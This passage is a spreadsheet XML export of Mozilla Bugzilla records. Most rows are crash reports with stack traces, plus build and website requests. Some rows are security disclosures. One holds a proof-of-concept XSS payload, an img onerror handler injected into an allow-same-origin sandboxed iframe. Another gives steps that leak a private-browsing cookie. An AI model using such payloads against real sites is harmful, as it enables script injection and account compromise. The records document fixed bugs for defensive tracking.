          <t>Web Audio</t>
        </is>
      </c>
      <c r="K5546" t="inlineStr">
        <is>
          <t>33 Branch</t>
        </is>
      </c>
      <c r="L5546" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5546" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5546" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5546" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5546" t="inlineStr">
        <is>
          <t>[adv-main35+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5546" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5546" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5546" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T5546" t="n">
        <v>1</v>
      </c>
      <c r="U5546" t="n">
        <v>0</v>
      </c>
      <c r="V5546" t="n">
        <v>21</v>
      </c>
      <c r="W5546" t="inlineStr">
        <is>
          <t>Created attachment 8523922
testcase.html
FF Version: https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1416229949/firefox-36.0a1.en-US.linux-x86_64-asan.tar.bz2
Assertion + Stacktrace:
Assertion failure: aIndex &lt; Length() (invalid array index), at ../../../../dist/include/nsTArray.h:946
#0  0x00007fffe8459974 in nsTArray_Impl&lt;mozilla::AudioChunk, nsTArrayInfallibleAllocator&gt;::ElementAt (this=&lt;optimized out&gt;, aIndex=&lt;optimized out&gt;)
    at ../../../../dist/include/nsTArray.h:946
#1  0x00007fffea3e10bc in mozilla::dom::AudioParamTimeline::AudioNodeInputValue (this=&lt;optimized out&gt;, aCounter=0)
    at /builds/slave/m-cen-l64-asan-d-0000000000000/build/dom/media/webaudio/AudioParam.cpp:135
#2  0x00007fffea3ecbed in mozilla::dom::AudioParamTimeline::GetValueAtTime&lt;long&gt; (this=0x6110005b4448, aTime=&lt;optimized out&gt;, aCounter=0)
    at /builds/slave/m-cen-l64-asan-d-0000000000000/build/dom/media/webaudio/AudioParamTimeline.h:93
#3  0x00007fffea417580 in mozilla::dom::DelayNodeEngine::UpdateOutputBlock (
    this=0x6110005b4400, aOutput=&lt;optimized out&gt;, minDelay=&lt;optimized out&gt;)
    at /builds/slave/m-cen-l64-asan-d-0000000000000/build/dom/media/webaudio/DelayNode.cpp:142
...
With a release build of firefox the testcase gives a invalid read at 0x5a5a5a62 looks like poisoned memory.</t>
        </is>
      </c>
      <c r="X5546" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5547">
      <c r="A5547" t="n">
        <v>1124018</v>
      </c>
      <c r="B5547" t="inlineStr">
        <is>
          <t>2015-01-20 18:34:12 -0800</t>
        </is>
      </c>
      <c r="C5547" t="inlineStr">
        <is>
          <t>Intermittent test_file_resurrection_delete.html | application crashed [@ js::CurrentThreadCanAccessRuntime(JSRuntime *)]</t>
        </is>
      </c>
      <c r="D5547" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:45 -0700</t>
        </is>
      </c>
      <c r="E5547" t="n">
        <v>1</v>
      </c>
      <c r="F5547" t="n">
        <v>1</v>
      </c>
      <c r="G5547" t="n">
        <v>3</v>
      </c>
      <c r="H5547" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5547" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5547" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K5547" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L5547" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5547" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5547" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5547" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5547" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5547" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5547" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5547" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T5547" t="n">
        <v>1</v>
      </c>
      <c r="U5547" t="n">
        <v>0</v>
      </c>
      <c r="V5547" t="n">
        <v>23</v>
      </c>
      <c r="W5547" t="inlineStr">
        <is>
          <t>0xa5a5a5a5, ruh-roh.
17:45:54 INFO - 1837 INFO TEST-FAIL | dom/indexedDB/test/test_file_resurrection_delete.html | Skipping test in a worker because it's not structured properly
17:45:54 INFO - 1838 INFO Running test in main thread
17:45:54 INFO - 1839 INFO TEST-PASS | dom/indexedDB/test/test_file_resurrection_delete.html | Correct byte length
17:45:54 INFO - 1840 INFO TEST-PASS | dom/indexedDB/test/test_file_resurrection_delete.html | Got correct event type
17:45:54 INFO - 1841 INFO TEST-PASS | dom/indexedDB/test/test_file_resurrection_delete.html | Got correct event type
17:45:54 INFO - 1842 INFO TEST-PASS | dom/indexedDB/test/test_file_resurrection_delete.html | Correct db ref count
17:45:54 INFO - 1843 INFO TEST-PASS | dom/indexedDB/test/test_file_resurrection_delete.html | Correct db ref count
17:45:54 INFO - 1844 ERROR TEST-UNEXPECTED-FAIL | dom/indexedDB/test/test_file_resurrection_delete.html | application terminated with exit code 1
17:45:54 INFO - runtests.py | Application ran for: 0:20:36.348000
17:45:54 INFO - zombiecheck | Reading PID log: c:\users\cltbld\appdata\local\temp\tmpnxki92pidlog
17:45:54 INFO - ==&gt; process 2892 launched child process 1240 ("C:\slave\test\build\application\firefox\plugin-container.exe" --channel=2892.200d1960.850478488 "c:\users\cltbld\appdata\local\temp\tmps4ckpv.mozrunner\plugins\nptest.dll" -greomni "C:\slave\test\build\application\firefox\omni.ja" -appomni "C:\slave\test\build\application\firefox\browser\omni.ja" -appdir "C:\slave\test\build\application\firefox\browser" - 2892 "\\.\pipe\gecko-crash-server-pipe.2892" plugin)
17:45:54 INFO - ==&gt; process 2892 launched child process 4084 ("C:\slave\test\build\application\firefox\plugin-container.exe" --channel=2892.b51b550.769337565 "c:\users\cltbld\appdata\local\temp\tmps4ckpv.mozrunner\plugins\nptest.dll" -greomni "C:\slave\test\build\application\firefox\omni.ja" -appomni "C:\slave\test\build\application\firefox\browser\omni.ja" -appdir "C:\slave\test\build\application\firefox\browser" - 2892 "\\.\pipe\gecko-crash-server-pipe.2892" plugin)
17:46:03 INFO - mozcrash Saved minidump as C:\slave\test\build\blobber_upload_dir\3a844c31-8681-49fa-a509-7c50caa3ad88.dmp
17:46:03 INFO - mozcrash Saved app info as C:\slave\test\build\blobber_upload_dir\3a844c31-8681-49fa-a509-7c50caa3ad88.extra
17:46:03 WARNING - PROCESS-CRASH | dom/indexedDB/test/test_file_resurrection_delete.html | application crashed [@ js::CurrentThreadCanAccessRuntime(JSRuntime *)]
17:46:03 INFO - Crash dump filename: c:\users\cltbld\appdata\local\temp\tmps4ckpv.mozrunner\minidumps\3a844c31-8681-49fa-a509-7c50caa3ad88.dmp
17:46:03 INFO - Operating system: Windows NT
17:46:03 INFO - 6.1.7601 Service Pack 1
17:46:03 INFO - CPU: x86
17:46:03 INFO - GenuineIntel family 6 model 30 stepping 5
17:46:03 INFO - 8 CPUs
17:46:03 INFO - Crash reason: EXCEPTION_ACCESS_VIOLATION_READ
17:46:03 INFO - Crash address: 0xffffffffa5a5a6dd
17:46:03 INFO - Thread 0 (crashed)
17:46:03 INFO - 0 xul.dll!js::CurrentThreadCanAccessRuntime(JSRuntime *) [Runtime.cpp:69cdf42cdaf9 : 806 + 0xb]
17:46:03 INFO - eip = 0x66a4cbee esp = 0x0022f170 ebp = 0x0022f170 ebx = 0x0c64d801
17:46:03 INFO - esi = 0x0022f238 edi = 0xa5a5a5a5 eax = 0x01d11140 ecx = 0xa5a5a5a5
17:46:03 INFO - edx = 0x00000000 efl = 0x00210246
17:46:03 INFO - Found by: given as instruction pointer in context
17:46:03 INFO - 1 xul.dll!js::gc::IsAboutToBeFinalized&lt;JSScript&gt; [Marking.cpp:69cdf42cdaf9 : 451 + 0x69]
17:46:03 INFO - eip = 0x668a00ee esp = 0x0022f178 ebp = 0x0022f184
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 2 xul.dll!js::types::TypeCompartment::sweep(js::FreeOp *) [jsinfer.cpp:69cdf42cdaf9 : 4864 + 0x8]
17:46:03 INFO - eip = 0x669b0194 esp = 0x0022f18c ebp = 0x0022f250
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 3 xul.dll!js::types::TypeZone::beginSweep(js::FreeOp *,bool,js::types::AutoClearTypeInferenceStateOnOOM &amp;) [jsinfer.cpp:69cdf42cdaf9 : 5178 + 0xe]
17:46:03 INFO - eip = 0x66960dce esp = 0x0022f258 ebp = 0x0022f278
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 4 xul.dll!JS::Zone::beginSweepTypes(js::FreeOp *,bool) [Zone.cpp:69cdf42cdaf9 : 119 + 0x17]
17:46:03 INFO - eip = 0x6686efe1 esp = 0x0022f280 ebp = 0x0022f294
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 5 xul.dll!js::gc::GCRuntime::beginSweepingZoneGroup() [jsgc.cpp:69cdf42cdaf9 : 5024 + 0x33]
17:46:03 INFO - eip = 0x667cd399 esp = 0x0022f29c ebp = 0x0022f6dc
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 6 xul.dll!js::gc::GCRuntime::beginSweepPhase(bool) [jsgc.cpp:69cdf42cdaf9 : 5163 + 0x6]
17:46:03 INFO - eip = 0x667cc315 esp = 0x0022f6e4 ebp = 0x0022f75c
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 7 xul.dll!js::gc::GCRuntime::incrementalCollectSlice(js::SliceBudget &amp;,JS::gcreason::Reason) [jsgc.cpp:69cdf42cdaf9 : 5889 + 0x13]
17:46:03 INFO - eip = 0x667f7e0b esp = 0x0022f764 ebp = 0x0022f784
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 8 xul.dll!js::gc::GCRuntime::gcCycle(bool,js::SliceBudget &amp;,JS::gcreason::Reason) [jsgc.cpp:69cdf42cdaf9 : 6084 + 0xa]
17:46:03 INFO - eip = 0x667e9620 esp = 0x0022f78c ebp = 0x0022f7e8
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 9 xul.dll!js::gc::GCRuntime::collect(bool,js::SliceBudget,JS::gcreason::Reason) [jsgc.cpp:69cdf42cdaf9 : 6209 + 0x15]
17:46:03 INFO - eip = 0x667d513a esp = 0x0022f7f0 ebp = 0x0022f880
17:46:03 INFO - Found by: call frame info
17:46:03 INFO - 10 xul.dll!JS::GCForReason(JSRuntime *,JSGCInvocationKind,JS::gcreason::Reason) [jsgc.cpp:69cdf42cdaf9 : 7063 + 0x37]
17:46:03 INFO - eip = 0x667ac0cb esp = 0x0022f888 ebp = 0x0022f8b0
17:46:03 INFO - Found by: call frame info</t>
        </is>
      </c>
      <c r="X5547" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5548">
      <c r="A5548" t="n">
        <v>1545352</v>
      </c>
      <c r="B5548" t="inlineStr">
        <is>
          <t>2019-04-17 23:26:37 -0700</t>
        </is>
      </c>
      <c r="C5548" t="inlineStr">
        <is>
          <t>Pending builds on Linux, OSX and Android</t>
        </is>
      </c>
      <c r="D5548" t="inlineStr">
        <is>
          <t>2019-04-22 15:18:28 -0700</t>
        </is>
      </c>
      <c r="E5548" t="n">
        <v>1</v>
      </c>
      <c r="F5548" t="n">
        <v>1</v>
      </c>
      <c r="G5548" t="n">
        <v>5</v>
      </c>
      <c r="H5548" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5548" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J5548" t="inlineStr">
        <is>
          <t>Operations and Service Requests</t>
        </is>
      </c>
      <c r="K5548" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5548" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5548" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5548" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5548" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5548" t="inlineStr"/>
      <c r="Q5548" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5548" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5548" t="n">
        <v>1</v>
      </c>
      <c r="U5548" t="n">
        <v>0</v>
      </c>
      <c r="V5548" t="n">
        <v>8</v>
      </c>
      <c r="W5548" t="inlineStr">
        <is>
          <t>I've noticed that Builds are being queued for over 10 hours on Linux, OSX and Android.
Here is the last time we have all builds running:
https://treeherder.mozilla.org/#/jobs?repo=autoland&amp;revision=43d9bbc5d92cd6511481700068984476c6fdc238
This seems to affect all trees.
Try looks to be unaffected by this issue
Trees are CLOSED for this issue.</t>
        </is>
      </c>
      <c r="X5548" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5549">
      <c r="A5549" t="n">
        <v>500254</v>
      </c>
      <c r="B5549" t="inlineStr">
        <is>
          <t>2009-06-24 12:03:35 -0700</t>
        </is>
      </c>
      <c r="C5549" t="inlineStr">
        <is>
          <t>Crash in vorbis_book_decodevv_add at vorbis_codebook.c:483</t>
        </is>
      </c>
      <c r="D5549" t="inlineStr">
        <is>
          <t>2009-10-29 03:50:50 -0700</t>
        </is>
      </c>
      <c r="E5549" t="n">
        <v>1</v>
      </c>
      <c r="F5549" t="n">
        <v>1</v>
      </c>
      <c r="G5549" t="n">
        <v>3</v>
      </c>
      <c r="H5549" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5549" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5549" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5549" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5549" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5549" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5549" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5549" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5549" t="inlineStr">
        <is>
          <t>[sg:critical?] specific fix in 1.9.1.2, library upgrade in 1.9.1.4</t>
        </is>
      </c>
      <c r="Q5549" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5549" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5549" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5549" t="n">
        <v>1</v>
      </c>
      <c r="U5549" t="n">
        <v>0</v>
      </c>
      <c r="V5549" t="n">
        <v>28</v>
      </c>
      <c r="W5549" t="inlineStr">
        <is>
          <t>This particular repro appears to be null deref but I have 50+ repros to go through.  The null pointer results from a math operation referencing other objects so...
#0	0x1363afab in vorbis_book_decodevv_add at vorbis_codebook.c:483
#1	0x13637cd9 in res2_inverse at vorbis_res0.c:872
#2	0x13639972 in mapping0_inverse at vorbis_mapping0.c:783
#3	0x1362daf6 in vorbis_synthesis at vorbis_synthesis.c:81
#4	0x135faddc in fs_vorbis_decode at fishsound_vorbis.c:158
#5	0x135fa122 in fish_sound_decode at fishsound_decode.c:117
#6	0x135ffaff in oggplay_callback_audio at oggplay_callback.c:391
#7	0x1360d04e in oggz_read_sync at oggz_read.c:483
#8	0x1360d459 in oggz_read at oggz_read.c:606
#9	0x135feb95 in oggplay_step_decoding at oggplay.c:691
#10	0x135ebfec in nsOggDecodeStateMachine::DecodeFrame at nsOggDecoder.cpp:732
#11	0x135f1683 in nsOggDecodeStateMachine::Run at nsOggDecoder.cpp:1428
#12	0x005759e4 in nsThread::ProcessNextEvent at nsThread.cpp:510
#13	0x004fe968 in NS_ProcessNextEvent_P at nsThreadUtils.cpp:227
#14	0x00575bf3 in nsThread::ThreadFunc at nsThread.cpp:254
#15	0x00728465 in _pt_root at ptthread.c:228
#16	0x96291155 in _pthread_start
#17	0x96291012 in thread_start</t>
        </is>
      </c>
      <c r="X5549" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5550">
      <c r="A5550" t="n">
        <v>1739957</v>
      </c>
      <c r="B5550" t="inlineStr">
        <is>
          <t>2021-11-08 00:32:10 -0800</t>
        </is>
      </c>
      <c r="C5550" t="inlineStr">
        <is>
          <t>Appending elements to sandboxed iframe can trigger javascript execution even if allow-scripts is not set</t>
        </is>
      </c>
      <c r="D5550" t="inlineStr">
        <is>
          <t>2024-10-14 09:37:00 -0700</t>
        </is>
      </c>
      <c r="E5550" t="n">
        <v>1</v>
      </c>
      <c r="F5550" t="n">
        <v>1</v>
      </c>
      <c r="G5550" t="n">
        <v>3</v>
      </c>
      <c r="H5550" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5550" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5550" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5550" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5550" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5550" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5550" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main97+][adv-esr91.6+]</t>
        </is>
      </c>
      <c r="Q5550" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5550" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5550" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T5550" t="n">
        <v>1</v>
      </c>
      <c r="U5550" t="n">
        <v>0</v>
      </c>
      <c r="V5550" t="n">
        <v>21</v>
      </c>
      <c r="W5550" t="inlineStr">
        <is>
          <t>Created attachment 9249715
index.html
This issue was discovered while testing the security of a web application that uses sandboxed iframes to render user supplied HTML as part of a templeting tool. The application assumes (rightfully?) that adding elements to a sandboxed iframe will not trigger any supplied JavaScript. This is the case when using the webapp in Chromium based browsers, but when testing the application in Firefox appending a "broken image XSS payload" to the body of the iframe did trigger JavaScript execution.
If the page contains an iframe such as:
&lt;iframe title="test" id="frame01" sandbox="allow-same-origin" src="temp.html"&gt;&lt;/iframe&gt;
and a new element is added to the body like this:
let newDiv = document.createElement("div");
newDiv.innerHTML = "&lt;img src='x' onerror='parent.window.alert(document.domain)'&gt;";
frame.contentWindow.document.body.appendChild(newDiv);
The alert box will trigger in Firefox. Important to note is the sandbox attribute allow-same-origin which is needed to be able to write to the iframe at all. Otherwise, writing will be blocked by cross-origin policies. But this attribute should not allow JavaScript execution. The src="temp.html" part is only needed when testing on Chromium as the image will not be added if the body is empty. In Firefox one can omit the src="temp.html" part and still have the JavaScript trigger.
I have tested this on Firefox 94.0.1 (64-bit) on Windows 10 (OS build 19042.1288) and Firefox 94.0.1 on MacOS
I have attached a HTML file to use as a POC. (Or just visit the linked CodePen snippet from the URL section)
POC:
1. Download the file and put it in a new directory on disk
2. Start a HTTP server from the directory (for example with the command:  python3 -m http.server )
3. Go to the webpage with Firefox. If started with python http.server the default is http://localhost
4. The alert box will pop
5. Go to the same site in Chrome
6. No alert box will pop
This behavior did, in the case of the mentioned web app, lead to an XSS issue that only appeared in Firefox and led to a compromise of the user account.
I have not digged any deeper into why Firefox does this, but as I read in your guidelines, you wanted researchers to send in bugs as soon as discovered and add context later. I hope that this information is sufficient for now, and please ask me for more information if needed!
Best regards
Johan Carlsson</t>
        </is>
      </c>
      <c r="X5550" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5551">
      <c r="A5551" t="n">
        <v>474395</v>
      </c>
      <c r="B5551" t="inlineStr">
        <is>
          <t>2009-01-20 00:55:16 -0800</t>
        </is>
      </c>
      <c r="C5551" t="inlineStr">
        <is>
          <t>Add openID support to quality.mozilla.org</t>
        </is>
      </c>
      <c r="D5551" t="inlineStr">
        <is>
          <t>2010-05-28 10:25:56 -0700</t>
        </is>
      </c>
      <c r="E5551" t="n">
        <v>1</v>
      </c>
      <c r="F5551" t="n">
        <v>1</v>
      </c>
      <c r="G5551" t="n">
        <v>5</v>
      </c>
      <c r="H5551" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5551" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J5551" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K5551" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5551" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5551" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5551" t="inlineStr"/>
      <c r="Q5551" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5551" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5551" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5551" t="n">
        <v>1</v>
      </c>
      <c r="U5551" t="n">
        <v>0</v>
      </c>
      <c r="V5551" t="n">
        <v>8</v>
      </c>
      <c r="W5551" t="inlineStr">
        <is>
          <t>OpenID is supported in drupal - having openID might help get more users to create accounts and participate to the QA effort.</t>
        </is>
      </c>
      <c r="X5551" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5552">
      <c r="A5552" t="n">
        <v>1663261</v>
      </c>
      <c r="B5552" t="inlineStr">
        <is>
          <t>2020-09-05 06:40:58 -0700</t>
        </is>
      </c>
      <c r="C5552" t="inlineStr">
        <is>
          <t>Fenix file download request shares private browsing mode cookie</t>
        </is>
      </c>
      <c r="D5552" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:24 -0700</t>
        </is>
      </c>
      <c r="E5552" t="n">
        <v>1</v>
      </c>
      <c r="F5552" t="n">
        <v>1</v>
      </c>
      <c r="G5552" t="n">
        <v>2</v>
      </c>
      <c r="H5552" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5552" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J5552" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5552" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5552" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5552" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5552" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5552" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5552" t="inlineStr">
        <is>
          <t>[adv-main83+][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5552" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5552" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5552" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5552" t="n">
        <v>1</v>
      </c>
      <c r="U5552" t="n">
        <v>0</v>
      </c>
      <c r="V5552" t="n">
        <v>33</v>
      </c>
      <c r="W5552" t="inlineStr">
        <is>
          <t>Created attachment 9174051
private_mode_bypass_by_download.gif
Similar to Bug 1657251, file download request in Fenix shares private mode cookie with normal mode.
Steps to reproduce (see also the attached demo)
1) Open http://csrf.jp/2020/a_download.html in private browsing mode
2) Tap "Download" link and start download (then private mode cookie is recorded by the download response)
3) Open http://csrf.jp/2020/a_download.html in normal browsing mode
4) Tap "Download" link again, then the cookie that was stored at 2) is sent through the request</t>
        </is>
      </c>
      <c r="X5552" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5553">
      <c r="A5553" t="n">
        <v>938431</v>
      </c>
      <c r="B5553" t="inlineStr">
        <is>
          <t>2013-11-13 16:46:41 -0800</t>
        </is>
      </c>
      <c r="C5553" t="inlineStr">
        <is>
          <t>Assertion failure: consumer-&gt;isConsistentFloat32Use(), at jit/IonAnalysis.cpp</t>
        </is>
      </c>
      <c r="D5553" t="inlineStr">
        <is>
          <t>2014-01-30 22:56:37 -0800</t>
        </is>
      </c>
      <c r="E5553" t="n">
        <v>1</v>
      </c>
      <c r="F5553" t="n">
        <v>1</v>
      </c>
      <c r="G5553" t="n">
        <v>3</v>
      </c>
      <c r="H5553" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5553" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5553" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5553" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5553" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5553" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5553" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5553" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5553" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main27+]</t>
        </is>
      </c>
      <c r="Q5553" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5553" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5553" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T5553" t="n">
        <v>1</v>
      </c>
      <c r="U5553" t="n">
        <v>0</v>
      </c>
      <c r="V5553" t="n">
        <v>19</v>
      </c>
      <c r="W5553" t="inlineStr">
        <is>
          <t>Created attachment 831920
lldb stack
function x() {}
ParallelArray(3385, function(y) {
    Object.defineProperty([], 8, {
        e: (y ? x : Math.fround(1))
    })
})
asserts js debug shell on m-c changeset 7b014f0f3b03 with --baseline-eager at Assertion failure: consumer-&gt;isConsistentFloat32Use(), at jit/IonAnalysis.cpp
My configure flags are:
CC="clang -Qunused-arguments" AR=ar CXX="clang++ -Qunused-arguments" sh ./configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --enable-methodjit --enable-type-inference --disable-tests --with-ccache --disable-threadsafe
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/13568a3576cd
user:        Benjamin Bouvier
date:        Thu Sep 12 14:54:01 2013 -0700
summary:     Bug 915301: Check Float32 coherency; r=sstangl</t>
        </is>
      </c>
      <c r="X5553" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5554">
      <c r="A5554" t="n">
        <v>239741</v>
      </c>
      <c r="B5554" t="inlineStr">
        <is>
          <t>2004-04-05 14:57:56 -0700</t>
        </is>
      </c>
      <c r="C5554" t="inlineStr">
        <is>
          <t>Unable to forward messages</t>
        </is>
      </c>
      <c r="D5554" t="inlineStr">
        <is>
          <t>2004-04-05 15:00:22 -0700</t>
        </is>
      </c>
      <c r="E5554" t="n">
        <v>1</v>
      </c>
      <c r="F5554" t="n">
        <v>1</v>
      </c>
      <c r="G5554" t="n">
        <v>2</v>
      </c>
      <c r="H5554" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5554" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J5554" t="inlineStr">
        <is>
          <t>Message Compose Window</t>
        </is>
      </c>
      <c r="K5554" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5554" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5554" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5554" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5554" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5554" t="inlineStr"/>
      <c r="Q5554" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5554" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5554" t="inlineStr">
        <is>
          <t>Thunderbird0.6</t>
        </is>
      </c>
      <c r="T5554" t="n">
        <v>1</v>
      </c>
      <c r="U5554" t="n">
        <v>0</v>
      </c>
      <c r="V5554" t="n">
        <v>2</v>
      </c>
      <c r="W5554" t="inlineStr">
        <is>
          <t>I get an error when the compose window trys to come up.
